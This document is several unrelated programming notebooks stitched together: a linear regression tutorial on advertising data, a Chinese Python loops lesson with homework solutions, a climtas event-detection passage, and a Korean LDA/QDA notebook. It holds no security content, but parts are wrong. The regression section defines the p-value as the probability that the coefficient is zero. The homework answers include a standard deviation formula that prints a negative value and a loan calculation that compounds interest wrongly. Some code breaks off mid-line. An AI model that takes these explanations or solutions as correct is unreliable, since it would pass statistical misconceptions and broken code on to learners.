to answer those questions!# read data into a DataFrame data = pd.read_csv('http://www-bcf.usc.edu/~gareth/ISL/Advertising.csv', index_col=0) data.head()What are the **features**?- TV: advertising dollars spent on TV for a single product in a given market (in thousands of dollars)- Radio: advertising dollars spent on Radio- Newspaper: advertising dollars spent on NewspaperWhat is the **response**?- Sales: sales of a single product in a given market (in thousands of widgets)# print the shape of the DataFrame data.shapeThere are 200 **observations**, and thus 200 markets in the dataset.# visualize the relationship between the features and the response using scatterplots fig, axs = plt.subplots(1, 3, sharey=True) data.plot(kind='scatter', x='TV', y='Sales', ax=axs[0], figsize=(16, 8)) data.plot(kind='scatter', x='Radio', y='Sales', ax=axs[1]) data.plot(kind='scatter', x='Newspaper', y='Sales', ax=axs[2])Questions About the Advertising DataLet's pretend you work for the company that manufactures and markets this widget. The company might ask you the following: On the basis of this data, how should we spend our advertising money in the future?This general question might lead you to more specific questions:1. Is there a relationship between ads and sales?2. How strong is that relationship?3. Which ad types contribute to sales?4. What is the effect of each ad type of sales?5. Given ad spending in a particular market, can sales be predicted?We will explore these questions below! Simple Linear RegressionSimple linear regression is an approach for predicting a **quantitative response** using a **single feature** (or "predictor" or "input variable"). It takes the following form:$y = \beta_0 + \beta_1x$What does each term represent?- $y$ is the response- $x$ is the feature- $\beta_0$ is the intercept- $\beta_1$ is the coefficient for xTogether, $\beta_0$ and $\beta_1$ are called the **model coefficients**. To create your model, you must "learn" the values of these coefficients. And once we've learned these coefficients, we can use the model to predict Sales! 
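For the single-feature case these "learned" values have a simple closed form, so you can compute them by hand before reaching for a library. The snippet below is a minimal sketch (it assumes the `data` DataFrame read in earlier; `x_tv`, `y_sales`, `beta_0`, and `beta_1` are just local names for this illustration) and should reproduce the coefficients that Statsmodels reports in the next section.

```python
# Minimal sketch: closed-form least-squares estimates for Sales ~ TV.
# Assumes the `data` DataFrame loaded above, with its TV and Sales columns.
x_tv = data['TV']
y_sales = data['Sales']

# slope: sum of cross-deviations divided by sum of squared deviations of x
beta_1 = ((x_tv - x_tv.mean()) * (y_sales - y_sales.mean())).sum() / ((x_tv - x_tv.mean()) ** 2).sum()
# intercept: mean of y minus slope times mean of x
beta_0 = y_sales.mean() - beta_1 * x_tv.mean()

print(beta_0, beta_1)  # should match lm.params from the Statsmodels fit below
```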
Estimating ("Learning") Model CoefficientsGenerally speaking, coefficients are estimated using the **least squares criterion**, which means we are find the line (mathematically) which minimizes the **sum of squared residuals** (or "sum of squared errors"): What elements are present in the diagram?- The black dots are the **observed values** of x and y.- The blue line is our **least squares line**.- The red lines are the **residuals**, which are the distances between the observed values and the least squares line.How do the model coefficients relate to the least squares line?- $\beta_0$ is the **intercept** (the value of $y$ when $x$=0)- $\beta_1$ is the **slope** (the change in $y$ divided by change in $x$)Here is a graphical depiction of those calculations: Let's use **Statsmodels** to estimate the model coefficients for the advertising data:# this is the standard import if you're using "formula notation" (similar to R) import statsmodels.formula.api as smf # create a fitted model in one line lm = smf.ols(formula='Sales ~ TV', data=data).fit() # print the coefficients lm.paramsInterpreting Model CoefficientsHow do we interpret the TV coefficient ($\beta_1$)?- A "unit" increase in TV ad spending is **associated with** a 0.047537 "unit" increase in Sales.- Or more clearly: An additional $1,000 spent on TV ads is **associated with** an increase in sales of 47.537 widgets.Note that if an increase in TV ad spending was associated with a **decrease** in sales, $\beta_1$ would be **negative**. Using the Model for PredictionLet's say that there was a new market where the TV advertising spend was **$50,000**. What would we predict for the Sales in that market?$$y = \beta_0 + \beta_1x$$$$y = 7.032594 + 0.047537 \times 50$$# manually calculate the prediction 7.032594 + 0.047537*50Thus, we would predict Sales of **9,409 widgets** in that market.Of course, we can also use Statsmodels to make the prediction:# you have to create a DataFrame since the Statsmodels formula interface expects it X_new = pd.DataFrame({'TV': [50]}) X_new.head() # use the model to make predictions on a new value lm.predict(X_new)Plotting the Least Squares LineLet's make predictions for the **smallest and largest observed values of x**, and then use the predicted values to plot the least squares line:# create a DataFrame with the minimum and maximum values of TV X_new = pd.DataFrame({'TV': [data.TV.min(), data.TV.max()]}) X_new.head() # make predictions for those x values and store them preds = lm.predict(X_new) preds # first, plot the observed data data.plot(kind='scatter', x='TV', y='Sales') # then, plot the least squares line plt.plot(X_new, preds, c='red', linewidth=2)Confidence in our Model**Question:** Is linear regression a high bias/low variance model, or a low bias/high variance model?**Answer:** High bias/low variance. Under repeated sampling, the line will stay roughly in the same place (low variance), but the average of those models won't do a great job capturing the true relationship (high bias). Note that low variance is a useful characteristic when you don't have a lot of training data!A closely related concept is **confidence intervals**. 
Statsmodels calculates 95% confidence intervals for our model coefficients, which are interpreted as follows: If the population from which this sample was drawn was **sampled 100 times**, approximately **95 of those confidence intervals** would contain the "true" coefficient.# print the confidence intervals for the model coefficients lm.conf_int()Keep in mind that we only have a **single sample of data**, and not the **entire population of data**. The "true" coefficient is either within this interval or it isn't, but there's no way to actually know. We estimate the coefficient with the data we do have, and we show uncertainty about that estimate by giving a range that the coefficient is **probably** within.Note that using 95% confidence intervals is just a convention. You can create 90% confidence intervals (which will be more narrow), 99% confidence intervals (which will be wider), or whatever intervals you like. Hypothesis Testing and p-valuesClosely related to confidence intervals is **hypothesis testing**. Generally speaking, you start with a **null hypothesis** and an **alternative hypothesis** (that is opposite the null). Then, you check whether the data supports **rejecting the null hypothesis** or **failing to reject the null hypothesis**.(Note that "failing to reject" the null is not the same as "accepting" the null hypothesis. The alternative hypothesis may indeed be true, except that you just don't have enough data to show that.)As it relates to model coefficients, here is the conventional hypothesis test:- **null hypothesis:** There is no relationship between TV ads and Sales (and thus $\beta_1$ equals zero)- **alternative hypothesis:** There is a relationship between TV ads and Sales (and thus $\beta_1$ is not equal to zero)How do we test this hypothesis? Intuitively, we reject the null (and thus believe the alternative) if the 95% confidence interval **does not include zero**. Conversely, the **p-value** represents the probability that the coefficient is actually zero:# print the p-values for the model coefficients lm.pvaluesIf the 95% confidence interval **includes zero**, the p-value for that coefficient will be **greater than 0.05**. If the 95% confidence interval **does not include zero**, the p-value will be **less than 0.05**. Thus, a p-value less than 0.05 is one way to decide whether there is likely a relationship between the feature and the response. (Again, using 0.05 as the cutoff is just a convention.)In this case, the p-value for TV is far less than 0.05, and so we **believe** that there is a relationship between TV ads and Sales.Note that we generally ignore the p-value for the intercept. How Well Does the Model Fit the data?The most common way to evaluate the overall fit of a linear model is by the **R-squared** value. R-squared is the **proportion of variance explained**, meaning the proportion of variance in the observed data that is explained by the model, or the reduction in error over the **null model**. (The null model just predicts the mean of the observed response, and thus it has an intercept and no slope.)R-squared is between 0 and 1, and higher is better because it means that more variance is explained by the model. Here's an example of what R-squared "looks like": You can see that the **blue line** explains some of the variance in the data (R-squared=0.54), the **green line** explains more of the variance (R-squared=0.64), and the **red line** fits the training data even further (R-squared=0.66). 
(Does the red line look like it's overfitting?)Let's calculate the R-squared value for our simple linear model:# print the R-squared value for the model lm.rsquaredIs that a "good" R-squared value? It's hard to say. The threshold for a good R-squared value depends widely on the domain. Therefore, it's most useful as a tool for **comparing different models**. Multiple Linear RegressionSimple linear regression can easily be extended to include multiple features. This is called **multiple linear regression**:$y = \beta_0 + \beta_1x_1 + ... + \beta_nx_n$Each $x$ represents a different feature, and each feature has its own coefficient. In this case:$y = \beta_0 + \beta_1 \times TV + \beta_2 \times Radio + \beta_3 \times Newspaper$Let's use Statsmodels to estimate these coefficients:# create a fitted model with all three features lm = smf.ols(formula='Sales ~ TV + Radio + Newspaper', data=data).fit() # print the coefficients lm.paramsHow do we interpret these coefficients? For a given amount of Radio and Newspaper ad spending, an **increase of $1000 in TV ad spending** is associated with an **increase in Sales of 45.765 widgets**.A lot of the information we have been reviewing piece-by-piece is available in the model summary output:# print a summary of the fitted model lm.summary()What are a few key things we learn from this output?- TV and Radio have significant **p-values**, whereas Newspaper does not. Thus we reject the null hypothesis for TV and Radio (that there is no association between those features and Sales), and fail to reject the null hypothesis for Newspaper.- TV and Radio ad spending are both **positively associated** with Sales, whereas Newspaper ad spending is **slightly negatively associated** with Sales. (However, this is irrelevant since we have failed to reject the null hypothesis for Newspaper.)- This model has a higher **R-squared** (0.897) than the previous model, which means that this model provides a better fit to the data than a model that only includes TV. Feature SelectionHow do I decide **which features to include** in a linear model? Here's one idea:- Try different models, and only keep predictors in the model if they have small p-values.- Check whether the R-squared value goes up when you add new predictors.What are the **drawbacks** to this approach?- Linear models rely upon a lot of **assumptions** (such as the features being independent), and if those assumptions are violated (which they usually are), R-squared and p-values are less reliable.- Using a p-value cutoff of 0.05 means that if you add 100 predictors to a model that are **pure noise**, 5 of them (on average) will still be counted as significant.- R-squared is susceptible to **overfitting**, and thus there is no guarantee that a model with a high R-squared value will generalize. Below is an example:# only include TV and Radio in the model lm = smf.ols(formula='Sales ~ TV + Radio', data=data).fit() lm.rsquared # add Newspaper to the model (which we believe has no association with Sales) lm = smf.ols(formula='Sales ~ TV + Radio + Newspaper', data=data).fit() lm.rsquared**R-squared will always increase as you add more features to the model**, even if they are unrelated to the response. 
Thus, selecting the model with the highest R-squared is not a reliable approach for choosing the best linear model.There is alternative to R-squared called **adjusted R-squared** that penalizes model complexity (to control for overfitting), but it generally [under-penalizes complexity](http://scott.fortmann-roe.com/docs/MeasuringError.html).So is there a better approach to feature selection? **Cross-validation.** It provides a more reliable estimate of out-of-sample error, and thus is a better way to choose which of your models will best **generalize** to out-of-sample data. There is extensive functionality for cross-validation in scikit-learn, including automated methods for searching different sets of parameters and different models. Importantly, cross-validation can be applied to any model, whereas the methods described above only apply to linear models. Linear Regression in scikit-learnLet's redo some of the Statsmodels code above in scikit-learn:# create X and y feature_cols = ['TV', 'Radio', 'Newspaper'] X = data[feature_cols] y = data.Sales # follow the usual sklearn pattern: import, instantiate, fit from sklearn.linear_model import LinearRegression lm = LinearRegression() lm.fit(X, y) # print intercept and coefficients print lm.intercept_ print lm.coef_ # pair the feature names with the coefficients zip(feature_cols, lm.coef_) # predict for a new observation lm.predict([100, 25, 25]) # calculate the R-squared lm.score(X, y)Note that **p-values** and **confidence intervals** are not (easily) accessible through scikit-learn. Handling Categorical Predictors with Two CategoriesUp to now, all of our predictors have been numeric. What if one of our predictors was categorical?Let's create a new feature called **Size**, and randomly assign observations to be **small or large**:import numpy as np # set a seed for reproducibility np.random.seed(12345) # create a Series of booleans in which roughly half are True nums = np.random.rand(len(data)) mask_large = nums > 0.5 # initially set Size to small, then change roughly half to be large data['Size'] = 'small' data.loc[mask_large, 'Size'] = 'large' data.head()For scikit-learn, we need to represent all data **numerically**. If the feature only has two categories, we can simply create a **dummy variable** that represents the categories as a binary value:# create a new Series called IsLarge data['IsLarge'] = data.Size.map({'small':0, 'large':1}) data.head()Let's redo the multiple linear regression and include the **IsLarge** predictor:# create X and y feature_cols = ['TV', 'Radio', 'Newspaper', 'IsLarge'] X = data[feature_cols] y = data.Sales # instantiate, fit lm = LinearRegression() lm.fit(X, y) # print coefficients zip(feature_cols, lm.coef_)How do we interpret the **IsLarge coefficient**? For a given amount of TV/Radio/Newspaper ad spending, being a large market is associated with an average **increase** in Sales of 57.42 widgets (as compared to a Small market, which is called the **baseline level**).What if we had reversed the 0/1 coding and created the feature 'IsSmall' instead? The coefficient would be the same, except it would be **negative instead of positive**. As such, your choice of category for the baseline does not matter, all that changes is your **interpretation** of the coefficient. 
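To see this concretely, here is a quick check, sketched under the assumption that the `data` DataFrame and the `LinearRegression` import from above are still available; the `IsSmall` column is hypothetical and introduced only for this comparison.

```python
# Refit with the reversed dummy coding; only the dummy's coefficient sign should flip.
data['IsSmall'] = 1 - data['IsLarge']   # hypothetical reversed dummy (1 = small market)

feature_cols = ['TV', 'Radio', 'Newspaper', 'IsSmall']
X = data[feature_cols]
y = data.Sales

lm = LinearRegression()
lm.fit(X, y)
list(zip(feature_cols, lm.coef_))   # IsSmall coefficient should be roughly -57.42
```

The TV, Radio, and Newspaper coefficients are unchanged by the re-coding; only the intercept shifts and the dummy's coefficient changes sign, which is exactly the "interpretation, not substance" point made above.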
Handling Categorical Predictors with More than Two CategoriesLet's create a new feature called **Area**, and randomly assign observations to be **rural, suburban, or urban**:# set a seed for reproducibility np.random.seed(123456) # assign roughly one third of observations to each group nums = np.random.rand(len(data)) mask_suburban = (nums > 0.33) & (nums < 0.66) mask_urban = nums > 0.66 data['Area'] = 'rural' data.loc[mask_suburban, 'Area'] = 'suburban' data.loc[mask_urban, 'Area'] = 'urban' data.head()We have to represent Area numerically, but we can't simply code it as 0=rural, 1=suburban, 2=urban because that would imply an **ordered relationship** between suburban and urban (and thus urban is somehow "twice" the suburban category).Instead, we create **another dummy variable**:# create three dummy variables using get_dummies, then exclude the first dummy column area_dummies = pd.get_dummies(data.Area, prefix='Area').iloc[:, 1:] # concatenate the dummy variable columns onto the original DataFrame (axis=0 means rows, axis=1 means columns) data = pd.concat([data, area_dummies], axis=1) data.head()Here is how we interpret the coding:- **rural** is coded as Area_suburban=0 and Area_urban=0- **suburban** is coded as Area_suburban=1 and Area_urban=0- **urban** is coded as Area_suburban=0 and Area_urban=1Why do we only need **two dummy variables, not three?** Because two dummies captures all of the information about the Area feature, and implicitly defines rural as the baseline level. (In general, if you have a categorical feature with k levels, you create k-1 dummy variables.)If this is confusing, think about why we only needed one dummy variable for Size (IsLarge), not two dummy variables (IsSmall and IsLarge).Let's include the two new dummy variables in the model:# create X and y feature_cols = ['TV', 'Radio', 'Newspaper', 'IsLarge', 'Area_suburban', 'Area_urban'] X = data[feature_cols] y = data.Sales # instantiate, fit lm = LinearRegression() lm.fit(X, y) # print coefficients zip(feature_cols, lm.coef_)循环- 循环是一种控制语句块重复执行的结构- while 适用于广度遍历- for 开发中经常使用 while 循环- 当一个条件保持真的时候while循环重复执行语句- while 循环一定要有结束条件,否则很容易进入死循环- while 循环的语法是: while loop-contunuation-conndition: Statementi = 0 while i<10: print('hahaha') i += 1示例:sum = 0i = 1while i <10: sum = sum + i i = i + 1 错误示例:sum = 0i = 1while i <10: sum = sum + ii = i + 1- 一旦进入死循环可按 Ctrl + c 停止 EP:![](../Photo/143.png)![](../Photo/144.png) 验证码- 随机产生四个字母的验证码,如果正确,输出验证码正确。如果错误,产生新的验证码,用户重新输入。- 验证码只能输入三次,如果三次都错,返回“别爬了,我们小网站没什么好爬的”- 密码登录,如果三次错误,账号被锁定import random n = random.randint(65,122) N = "" i = 0 while 1: if 91<=n<=96: n = random.randint(65,122) else: N += chr(n) n = random.randint(65,122) i += 1 if i == 4: break print(N) count = 0 for i in range(1000): a = random.randint(0,1000) / 1000 if 0尝试死循环 实例研究:猜数字- 你将要编写一个能够随机生成一个0到10之间的且包括两者的数字程序,这个程序- 提示用户连续地输入数字直到正确,且提示用户输入的数字是过高还是过低 使用哨兵值来控制循环- 哨兵值来表明输入的结束- ![](../Photo/54.png) 警告![](../Photo/55.png) for 循环- Python的for 循环通过一个序列中的每个值来进行迭代- range(a,b,k), a,b,k 必须为整数- a: start- b: end- k: step- 注意for 是循环一切可迭代对象,而不是只能使用rangefor i in range(100): print('Joker is a better man!') a = 100 bb = 'JOker' bb.__iter__() c = [1,2,3] c.__iter__ {'key':'value'}.__iter__ (1,3,43).__iter__ {1,2,43}.__iter__ for i in range(5): print(i)在Python里面一切皆对象 EP:- ![](../Photo/145.png)i = 1 sum_ = 0 while sum_ < 10000: sum_ += i i += 1 print(sum_) sum_ = 0 for i in range(1,10001): sum_ += i if sum_ > 10000: break print(sum_) sum = 0 i = 0 while i < 1001: sum = sum + i i += 1 print(sum)500500嵌套循环- 一个循环可以嵌套另一个循环- 
每次循环外层时,内层循环都会被刷新重新完成循环- 也就是说,大循环执行一次,小循环会全部执行一次- 注意:> - 多层循环非常耗时 - 最多使用3层循环 EP:- 使用多层循环完成9X9乘法表- 显示50以内所有的素数 关键字 break 和 continue- break 跳出循环,终止循环- continue 跳出此次循环,继续执行for i in range(1,10): for j in range(1,i+1): print(j,'X',i,'=',i*j,end=' ') print()1 X 1 = 1 1 X 2 = 2 2 X 2 = 4 1 X 3 = 3 2 X 3 = 6 3 X 3 = 9 1 X 4 = 4 2 X 4 = 8 3 X 4 = 12 4 X 4 = 16 1 X 5 = 5 2 X 5 = 10 3 X 5 = 15 4 X 5 = 20 5 X 5 = 25 1 X 6 = 6 2 X 6 = 12 3 X 6 = 18 4 X 6 = 24 5 X 6 = 30 6 X 6 = 36 1 X 7 = 7 2 X 7 = 14 3 X 7 = 21 4 X 7 = 28 5 X 7 = 35 6 X 7 = 42 7 X 7 = 49 1 X 8 = 8 2 X 8 = 16 3 X 8 = 24 4 X 8 = 32 5 X 8 = 40 6 X 8 = 48 7 X 8 = 56 8 X 8 = 64 1 X 9 = 9 2 X 9 = 18 3 X 9 = 27 4 X 9 = 36 5 X 9 = 45 6 X 9 = 54 7 X 9 = 63 8 X 9 = 72 9 X 9 = 81注意![](../Photo/56.png)![](../Photo/57.png) Homework- 1 ![](../Photo/58.png)a = 1 sum_ = 0 b = 0 c = 0 d = 0 def zs(): global b b += 1 def fs(): global c c += 1 def cs(): global d d += 1 def date(): global a global sum_ while a != 0: a = eval(input('输入')) if a>0: zs() if a<0: fs() if a != 0: cs() sum_ += a date() print(b) print(c) print(sum_ / d)输入1 输入2 输入-1 输入3 输入0 3 1 1.25- 2![](../Photo/59.png)def doll(): menoy = 10000 year = 0 while year<15: year += 1 menoy = menoy + menoy*0.05 if year == 10: print('%.6f'%(menoy)) elif year == 14: print('%.6f'%(menoy)) doll()16288.946268 19799.315994- 3![](../Photo/58.png) - 4![](../Photo/60.png)def shuzi(): num = 100 i=0 while num<1001: num += 1 if num % 5 == 0 and num % 6 ==0: print(num,end=' ') i +=1 if i%10==0: print() shuzi()120 150 180 210 240 270 300 330 360 390 420 450 480 510 540 570 600 630 660 690 720 750 780 810 840 870 900 930 960 990- 5![](../Photo/61.png)def n(): a=0 a1=0 while a**2 < 12000: a += 1 print(a) while a1**3 < 12000: a1 += 1 print(a1-1) n()110 22- 6![](../Photo/62.png)def lixi(): global rate global monthly global money while rate<0.081: monthly=money*rate money=money+monthly print('%.3f %.2f %.2f'%(rate*100,monthly,money)) rate=rate+0.00125 money=int(input('Loan Amount:')) years=int(input('Number of Years:')) rate=0.05 print('Interest Rate Monthly Payment Total Payment') while rate<0.081: lixi()Loan Amount:10000 Number of Years:5 Interest Rate Monthly Payment Total Payment 5.000 500.00 10500.00 5.125 538.12 11038.12 5.250 579.50 11617.63 5.375 624.45 12242.07 5.500 673.31 12915.39 5.625 726.49 13641.88 5.750 784.41 14426.29 5.875 847.54 15273.83 6.000 916.43 16190.26 6.125 991.65 17181.91 6.250 1073.87 18255.78 6.375 1163.81 19419.59 6.500 1262.27 20681.86 6.625 1370.17 22052.04 6.750 1488.51 23540.55 6.875 1618.41 25158.96 7.000 1761.13 26920.09 7.125 1918.06 28838.15 7.250 2090.77 30928.91 7.375 2281.01 33209.92 7.500 2490.74 35700.66 7.[...]- 7![](../Photo/63.png)def bj(): n = 0 n1 = 0 i = 0 for i in range(50000,0,-1): n += 1/i print(n) for i in range(1,50001,1): n1 += 1/i print(n1) bj()11.397003949278519 11.397003949278504- 8![](../Photo/64.png)def bj(): n = 0 for i in range(1,98,2): n += i/ (i+2) print('答案:%.2f'%n) bj()答案:45.12- 9![](../Photo/65.png)def js(x): n= 0 for i in range(1,x): n += 4*((-1)**(i+1)/(2*i-1)) print(n) for i in range(10000,100001,10000): js(i)3.1416926635905345 3.1416426560898874 3.1416259880342583 3.1416176542148064 3.1416126539897853 3.1416093205342155 3.1416069395081365 3.1416051537460006 3.1416037648243034 3.1416026536897204- 10 ![](../Photo/66.png)def js(): for i in range(1,10000): n = 0 for j in range(1,i): if i % j == 0: n += j if i == n: print(i,end = ' ') js()6 28 496 8128- 11![](../Photo/67.png)a = 0 i = 0 j = 0 def js1(): global i global j for i in range(1,8,1): for j in 
range(i+1,8): if i!=j: js2() def js2(): global a print(i,j) a += 1 print(a) js1()1 2 1 1 3 2 1 4 3 1 5 4 1 6 5 1 7 6 2 3 7 2 4 8 2 5 9 2 6 10 2 7 11 3 4 12 3 5 13 3 6 14 3 7 15 4 5 16 4 6 17 4 7 18 5 6 19 5 7 20 6 7 21- 12![](../Photo/68.png)def js(): sum=0 sum2=0 for i in range(10): x=float(input()) sum=sum+x sum2=sum2+x*x print('The mean is %.2f'%(sum/10)) FC=(sum2-sum*sum)/90 print('The standard deviation is ',FC) print('Enter ten number :',end=" ") js()Enter ten number : 1 2 3 5.5 5.6 6 7 8 9 10 The mean is 5.71 The standard deviation is -31.720000000000002Eventimport xarray import numpy import pandas import climtas import xesmf import dask.arrayWe have a Dask dataset, and we'd like to identify periods where the value is above some thresholdtime = pandas.date_range('20010101', '20040101', freq='D', closed='left') data = dask.array.random.random((len(time),50,100), chunks=(90,25,25)) lat = numpy.linspace(-90, 90, data.shape[1]) lon = numpy.linspace(-180, 180, data.shape[2], endpoint=False) da = xarray.DataArray(data, coords=[('time', time), ('lat', lat), ('lon', lon)], name='temperature') da.lat.attrs['standard_name'] = 'latitude' da.lon.attrs['standard_name'] = 'longitude' da[climtas.event.find_events](api/event.rstclimtas.event.find_events) will create a Pandas table of events. You give it an array of boolean values, `True` if an event is active, which can e.g. be generated by comparing against a threshold like a mean or percentile.threshold = da.mean('time') events = climtas.event.find_events(da > threshold, min_duration = 10) eventsSince the result is a Pandas table normal Pandas operations will work, here's a histogram of event durations. The values in the event table are the array indices where events start and the number of steps the event is active for.events.hist('event_duration', grid=False);You can convert from the indices to coordinates using [climtas.event.event_coords](api/event.rstclimtas.event.event_coords). Events still active at the end of the dataset are marked with a duration of NaT (not a time)coords = climtas.event.event_coords(da, events) coordsTo get statistics for each event use [climtas.event.map_events](api/event.rstclimtas.event.map_events). This takes a function that is given the event's data and returns a dict of different statistics. 
It's helpful to use `.values` here to return a number instead of a DataArray with coordinates and attributes.stats = climtas.event.map_events(da, events, lambda x: {'sum': x.sum().values, 'mean': x.mean().values}) statsAgain this is a Pandas dataframe, so you can join the different tables really simplycoords.join(stats)7.1 선형판별분석법과 이차판별분석법이차판별분석법import warnings warnings.filterwarnings(action='ignore') import scipy as sp import scipy.stats import statsmodels.api as sm import sklearn as sk import seaborn as sns import matplotlib as mpl import matplotlib.pylab as plt # 한글 나오도록 설정하기 set(sorted([f.name for f in mpl.font_manager.fontManager.ttflist])) # 폰트 설정 mpl.rc('font', family='NanumGothic') # 유니코드에서 음수 부호설정 mpl.rc('axes', unicode_minus=False) N = 100 rv1 = sp.stats.multivariate_normal([ 0, 0], [[0.7, 0.0], [0.0, 0.7]]) rv2 = sp.stats.multivariate_normal([ 1, 1], [[0.8, 0.2], [0.2, 0.8]]) rv3 = sp.stats.multivariate_normal([-1, 1], [[0.8, 0.2], [0.2, 0.8]]) np.random.seed(0) X1 = rv1.rvs(N) X2 = rv2.rvs(N) X3 = rv3.rvs(N) y1 = np.zeros(N) y2 = np.ones(N) y3 = 2 * np.ones(N) X = np.vstack([X1, X2, X3]) y = np.hstack([y1, y2, y3]) plt.scatter(X1[:, 0], X1[:, 1], alpha=0.8, s=50, marker="o", color='r', label="class 1") plt.scatter(X2[:, 0], X2[:, 1], alpha=0.8, s=50, marker="s", color='g', label="class 2") plt.scatter(X3[:, 0], X3[:, 1], alpha=0.8, s=50, marker="x", color='b', label="class 3") plt.xlim(-5, 5) plt.ylim(-4, 5) plt.xlabel("$x_1$") plt.ylabel("$x_2$") plt.legend() plt.show() from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis qda = QuadraticDiscriminantAnalysis(store_covariance=True).fit(X, y) # 각 클래스 k의 사전확률 qda.priors_ # 각 클래스 k 에서 x 의 기댓값 벡터 μk 의 추정치 벡터 qda.means_ # 각 클래스 k 에서 x 의 공분산 행렬 Σk 의 추정치 행렬. # (생성자 인수 store_covariance 값이 True인 경우에만 제공) # sigma1 구한것 qda.covariance_[0] # sigma2 구한것 qda.covariance_[1] # p(2,-1|y=1),p(2,-1|y=2),p(2,-1|y=3) # 가능도를 구한것,, # priors는 1/3으로 동일하게 줬었음 rv1=sp.stats.multivariate_normal(X1.mean(axis=0),np.cov(X1.T)) rv2=sp.stats.multivariate_normal(X2.mean(axis=0),np.cov(X2.T)) rv3=sp.stats.multivariate_normal(X3.mean(axis=0),np.cov(X3.T)) rv1.pdf([2,-1]),rv2.pdf([2,-1]),rv3.pdf([2,-1]) x1min, x1max = -5, 5 x2min, x2max = -4, 5 XX1, XX2 = np.meshgrid(np.arange(x1min, x1max, (x1max-x1min)/1000), np.arange(x2min, x2max, (x2max-x2min)/1000)) YY = np.reshape(qda.predict(np.array([XX1.ravel(), XX2.ravel()]).T), XX1.shape) cmap = mpl.colors.ListedColormap(sns.color_palette(["r", "g", "b"]).as_hex()) plt.contourf(XX1, XX2, YY, cmap=cmap, alpha=0.5) plt.scatter(X1[:, 0], X1[:, 1], alpha=0.8, s=50, marker="o", color='r', label="클래스 1") plt.scatter(X2[:, 0], X2[:, 1], alpha=0.8, s=50, marker="s", color='g', label="클래스 2") plt.scatter(X3[:, 0], X3[:, 1], alpha=0.8, s=50, marker="x", color='b', label="클래스 3") plt.xlim(x1min, x1max) plt.ylim(x2min, x2max) plt.xlabel("$x_1$") plt.ylabel("$x_2$") plt.title("이차판별분석법 결과") plt.legend() plt.show()label_binarizeOvR ROC커브를 그릴때 사용할 수 있는 원핫인코딩 함수from sklearn.preprocessing import label_binarize y label_binarize(y,[0,1,2]) # y->y1 y2 y3 로 쪼개줌 # y1 0인지 아닌지 # y2 1인지 아닌지 # y3 2인지 아닌지iris데이터를 QDA로 분석from sklearn.naive_bayes import GaussianNB from sklearn.datasets import load_iris from sklearn.preprocessing import label_binarize from sklearn.metrics import roc_curve iris=load_iris() x=iris.data y=label_binarize(iris.target,[0,1,2]) # None이 세개 들어있는 리스트를 만듦 fpr=[None]*3 tpr=[None]*3 thr=[None]*3 for i in range(3): model=QuadraticDiscriminantAnalysis().fit(x,y[:,i]) 
fpr[i],tpr[i],thr[i]=roc_curve(y[:,i],model.predict_proba(x)[:,1]) plt.plot(fpr[i],tpr[i]) plt.xlabel("위양성률(Fall-Out)") plt.ylabel("재현률(Recall)") plt.show() fpr선형판별분석법N = 100 rv1 = sp.stats.multivariate_normal([ 0, 0], [[0.7, 0.0], [0.0, 0.7]]) rv2 = sp.stats.multivariate_normal([ 1, 1], [[0.8, 0.2], [0.2, 0.8]]) rv3 = sp.stats.multivariate_normal([-1, 1], [[0.8, 0.2], [0.2, 0.8]]) np.random.seed(0) X1 = rv1.rvs(N) X2 = rv2.rvs(N) X3 = rv3.rvs(N) y1 = np.zeros(N) y2 = np.ones(N) y3 = 2 * np.ones(N) X = np.vstack([X1, X2, X3]) y = np.hstack([y1, y2, y3]) plt.scatter(X1[:, 0], X1[:, 1], alpha=0.8, s=50, marker="o", color='r', label="class 1") plt.scatter(X2[:, 0], X2[:, 1], alpha=0.8, s=50, marker="s", color='g', label="class 2") plt.scatter(X3[:, 0], X3[:, 1], alpha=0.8, s=50, marker="x", color='b', label="class 3") plt.xlim(-5, 5) plt.ylim(-4, 5) plt.xlabel("$x_1$") plt.ylabel("$x_2$") plt.legend() plt.show() from sklearn.discriminant_analysis import LinearDiscriminantAnalysis # component써줘야함 근데 교재에는 3으로 되어있었는데 안돌아가서 2로함 lda = LinearDiscriminantAnalysis(n_components=2, solver="svd", store_covariance=True).fit(X, y) lda.means_ lda.covariance_ # 결과 x1min, x1max = -5, 5 x2min, x2max = -4, 5 XX1, XX2 = np.meshgrid(np.arange(x1min, x1max, (x1max-x1min)/1000), np.arange(x2min, x2max, (x2max-x2min)/1000)) YY = np.reshape(lda.predict(np.array([XX1.ravel(), XX2.ravel()]).T), XX1.shape) cmap = mpl.colors.ListedColormap(sns.color_palette(["r", "g", "b"]).as_hex()) plt.contourf(XX1, XX2, YY, cmap=cmap, alpha=0.5) plt.scatter(X1[:, 0], X1[:, 1], alpha=0.8, s=50, marker="o", color='r', label="클래스 1") plt.scatter(X2[:, 0], X2[:, 1], alpha=0.8, s=50, marker="s", color='g', label="클래스 2") plt.scatter(X3[:, 0], X3[:, 1], alpha=0.8, s=50, marker="x", color='b', label="클래스 3") plt.xlim(x1min, x1max) plt.ylim(x2min, x2max) plt.xlabel("$x_1$") plt.ylabel("$x_2$") plt.legend() plt.title("LDA 분석 결과") plt.show()iris데이터를 LDA로 분석iris=load_iris() x=iris.data y=label_binarize(iris.target,[0,1,2]) # None이 세개 들어있는 리스트를 만듦 fpr=[None]*3 tpr=[None]*3 thr=[None]*3 for i in range(3): model=LinearDiscriminantAnalysis( solver="svd", store_covariance=True).fit(x,y[:,i]) fpr[i],tpr[i],thr[i]=roc_curve(y[:,i],model.predict_proba(x)[:,1]) plt.plot(fpr[i],tpr[i]) plt.xlabel("위양성률(Fall-Out)") plt.ylabel("재현률(Recall)") plt.show() import warnings warnings.filterwarnings(action='ignore') import scipy as sp import scipy.stats import statsmodels.api as sm import sklearn as sk import seaborn as sns import matplotlib as mpl import matplotlib.pylab as plt from sklearn.naive_bayes import GaussianNB from sklearn.discriminant_analysis import LinearDiscriminantAnalysis from sklearn.datasets import load_iris from sklearn.preprocessing import label_binarize from sklearn.metrics import confusion_matrix from sklearn.metrics import classification_report y_true = [1, 0, 1, 1, 0, 1] y_pred = [0, 0, 1, 1, 0, 1] confusion_matrix(y_true, y_pred) print(classification_report(y_true, y_pred, target_names=['class 0', 'class 1'])) confusion_matrix(y_true, y_pred, labels=[1, 0])7.2 나이브베이즈 분류모형 조건부 독립# C는 어미의 몸무게 # A는 형의 몸무게 # B는 동생의 몸무게 np.random.seed(0) C = np.random.normal(100, 15, 2000) A = C + np.random.normal(0, 5, 2000) B = C + np.random.normal(0, 5, 2000) plt.figure(figsize=(8, 4)) plt.subplot(121) 